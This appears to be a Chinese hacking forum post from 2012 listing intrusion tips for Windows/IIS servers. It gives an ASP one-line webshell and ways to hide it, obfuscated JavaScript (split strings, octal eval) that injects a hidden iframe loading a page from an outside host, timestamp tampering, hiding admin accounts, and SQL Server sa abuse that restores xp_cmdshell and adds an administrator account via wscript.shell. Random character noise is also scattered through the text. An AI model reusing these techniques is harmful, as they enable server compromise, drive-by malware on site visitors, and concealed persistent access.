1 i4 |* Y( m2 a' g; G9 y2 o5 }53、隐藏ASP后门的两种方法
1 j8 w0 S$ M# z+ E. f1、建立非标准目录:mkdir images..\
" g0 p$ ?+ @1 b; G0 v- f8 j拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
1 L& g0 V z8 g5 P6 J5 p通过web访问ASP木马:http://ip/images../news.asp?action=login
/ k9 P0 a. D7 f- A( q0 h$ H. J7 r9 y5 N如何删除非标准目录:rmdir images..\ /s
% N# u3 u. j) h& m# j, l2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
2 G$ \3 ]4 N% q* R& F$ J3 qmkdir programme.asp
. O0 }: D8 B+ k新建1.txt文件内容:<!--#include file=”12.jpg”-->- r# b* l) y y' O) G; ], |
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件, k( c% C2 m" h4 S4 L( ?
attrib +H +S programme.asp9 h9 ]% I/ d3 e% P! e3 \: u2 `
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt8 i4 o9 r9 ?- ^5 i: Q
* E' E6 t: d# @% L' c
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
- J$ G8 K# H! ?# N8 P然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。( H% b6 v7 Y$ V- p9 |3 D! q- g
2 [* s8 P; ]$ w1 m
55、JS隐蔽挂马% u& @% y2 x" j9 ]9 D4 z
1.
7 f/ |# x! |1 p; kvar tr4c3="<iframe src=ht";: k3 v2 t% ]* Z1 w F; T+ w- ?
tr4c3 = tr4c3+"tp:/";$ |4 s) J5 _4 L2 \- u5 s* k' a% \3 p+ s7 F
tr4c3 = tr4c3+"/ww";; e8 Z* M0 v( |1 F0 M
tr4c3 = tr4c3+"w.tr4";
7 v7 I/ c6 S" K' Htr4c3 = tr4c3+"c3.com/inc/m";/ [$ `! n/ q4 q, V6 k
tr4c3 = tr4c3+"m.htm style="display:none"></i";
; k1 K+ u8 J3 d% e- Ytr4c3 =tr4c3+"frame>'";
1 l% ]$ P5 n: \2 s5 [$ odocument.write(tr4c3);
3 e, p5 l: v* c. [# Z避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。: g& M3 `- b3 f
! P/ T+ x1 M2 M/ S, F- M( N2.
1 I! k7 O) i# X转换进制,然后用EVAL执行。如, m* u3 i9 J x
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");* N' d2 T. _5 G# \; T: }$ p
不过这个有点显眼。% b b" t0 B- N; ~! o* J
3./ U, y0 a5 ?' w* t
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');9 Z2 o+ Z, L& k! U
最后一点,别忘了把文件的时间也修改下。* E( T. f+ ?* _: ~
- M+ r7 {; `, f* l/ u, m- w* y
56.3389终端入侵常用DOS命令( H" i* A# P6 ?2 Y" a5 V
taskkill taskkill /PID 1248 /t
/ ~. }6 W6 n5 H( |! g: M2 O/ p" f7 r3 g) P# I& i" S
tasklist 查进程
1 l1 z+ t" Q9 W3 V1 W# P$ j3 R; V- x& ^( ?' }0 a: O
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; W( B, |$ P6 t0 Xiisreset /reboot& ^5 {) e* v( K0 ^/ s
tsshutdn /reboot /delay:1 重起服务器( M& K, O' G+ N p! i( ^6 `+ V
- F+ U) ?; s+ glogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户," Z% Y6 j& ?) g# Y' Y! E
+ V+ w) X* m( [4 Y; @query user 查看当前终端用户在线情况
2 y8 v% }( ]: E( b
$ Y' d: z# |, B2 M要显示有关所有会话使用的进程的信息,请键入:query process * D# U" q- O( [
}# L1 B8 m6 A' }) ~: ?要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
4 O, Z. `' N6 \0 |* ~+ m7 o% N+ s1 Q( M7 s* L; h8 h1 _* X
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2' Y- n9 l; r; ]! A4 b2 e* T+ ~# b
, L7 ]/ Q4 o! z8 a4 L
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
6 M+ O1 P/ G$ y6 n4 S {& R' s' h$ s% A! @) |: \
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
( w7 h/ l) C7 ]
; r3 U. b" G b; o% _9 e" [命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
7 d4 H! ?6 f, r- B+ `+ g
5 ~) e+ L0 B" ]命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。, B' m2 U6 A1 I2 s! Y
" q& }, t9 v! J+ L9 ~
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机' Q: C) u) F0 h! P7 n0 W# f
: S6 o: } L6 [56、在地址栏或按Ctrl+O,输入:2 n; v$ B5 U) ?" ], W+ r+ X$ Z/ v
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
2 Y8 }/ p J; L- z9 {+ J+ h) U2 E" q) F. ^. y4 E3 h
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
/ J- J6 v$ y4 {! r L0 F4 I. g/ }2 G
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,# x, t; s- n( O9 F- `9 E4 q
用net localgroup administrators是可以看到管理组下,加了$的用户的。
8 R' X1 V" [+ ]% O$ R
0 R' N, c7 z1 v" V4 g; B58、 sa弱口令相关命令7 G* r8 a9 ?4 Z# Q& @+ z
) N5 d" i: x1 P一.更改sa口令方法:! O9 Q4 c. v$ {" E3 `7 g
用sql综合利用工具连接后,执行命令:0 ^, n$ L1 p' J
exec sp_password NULL,'20001001','sa'7 m) r/ N/ a2 l6 j# H$ h
(提示:慎用!)
: C$ W V/ N$ N6 }, j
0 Q) z; {& ^5 d: K$ h4 D# D二.简单修补sa弱口令.
~6 y. Y: I7 x* p. E! u) T5 X- Q% s* i; h5 B. Z. N
方法1:查询分离器连接后执行:' k5 N, Z7 [, o# B
if exists (select * from
! b$ i& E- z. A; z+ \dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and4 X s4 P9 E% ]
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
~2 \/ J9 h3 r; J6 s
' u* u; W+ F4 X2 T6 y7 C) Aexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'8 @; O9 x% t w9 G
* l5 m1 ^0 ^! _$ nGO8 C! ?. L1 u" W5 d# N& f: s
$ z7 s- f$ C6 |/ h- ^' N2 O" W然后按F5键命令执行完毕# l/ j f3 C# R1 J/ U
' B* h3 t' c7 J8 V1 J+ G0 i
方法2:查询分离器连接后, G* ^* C z: _3 ~7 ^1 V6 m, e8 o, z
第一步执行:use master
: \" U8 W' }% z, r& q9 o ~第二步执行:sp_dropextendedproc 'xp_cmdshell'# S- s, q3 M0 ]0 e* g5 [
然后按F5键命令执行完毕
/ {# u8 F( ?9 j& K' s% g) ~1 @0 F$ k* W) \6 c
6 P- U; O3 |1 V4 c2 j3 _8 i8 k
三.常见情况恢复执行xp_cmdshell." d/ F. V& R( ^; L. q
3 Q. A$ r- b3 U2 j9 s) e2 e9 `) T
; ]; `4 E; k, j+ a0 v' l9 ^8 y1 未能找到存储过程'master..xpcmdshell'.6 o3 [. m" w8 r7 e& c! y
恢复方法:查询分离器连接后,7 f* d. n3 x u' c/ Z9 \# {2 Q
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int/ f6 V% E, s, R7 L
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'* ]6 Z; ^, H& H2 T6 T0 o
然后按F5键命令执行完毕
$ H L; l5 R% s2 ^ y9 N4 n- y, Z/ [2 A' Y5 t5 L* h- r; B: K
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。): u! e" j) u1 a# G) J
恢复方法:查询分离器连接后,. R; H* s/ J( h H {% {+ o, B" S
第一步执行:sp_dropextendedproc "xp_cmdshell"
^8 a+ T! v: f. k- S8 E9 ^第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! D G! f8 n* v+ d4 t3 i
然后按F5键命令执行完毕+ k' B |0 m7 W* H# W
; i" O, I- \2 z; m* D5 ~8 _6 b, ]3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
3 A5 Z# d' t$ @, @0 Y3 X恢复方法:查询分离器连接后,
/ g7 ] |! X, H& b第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
# w1 }& a5 d& C: S+ B第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' / E# o& {9 F# |! g0 `& @9 q. Z
然后按F5键命令执行完毕, q4 X, Q. V8 E, q, ~
. C1 h7 z# }( w0 t四.终极方法.$ L5 V8 Z& F1 c( V, N8 ]
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:$ n, ?& l9 D& e) i0 y
查询分离器连接后,1 x6 } G' c; G# g* i7 T
2000servser系统:
9 @/ v" d, }# V6 @- L. J' g) v8 Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
7 T1 `: E/ x7 u# m5 | Y) O6 g( V% F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ D6 q% @8 b1 b$ j% \5 i4 I
' W& n, W# R/ G3 i0 m
xp或2003server系统:
8 d$ a; b9 z; j. U: m! R8 B. w! J- s: Z! c: p1 d: U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. X2 a6 }4 p- d. g
8 J1 V$ j) T1 z { o
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
$ b* c) U4 j. S0 b2 E N |
发表于 2012-9-15 14:51:03
收藏
支持
反对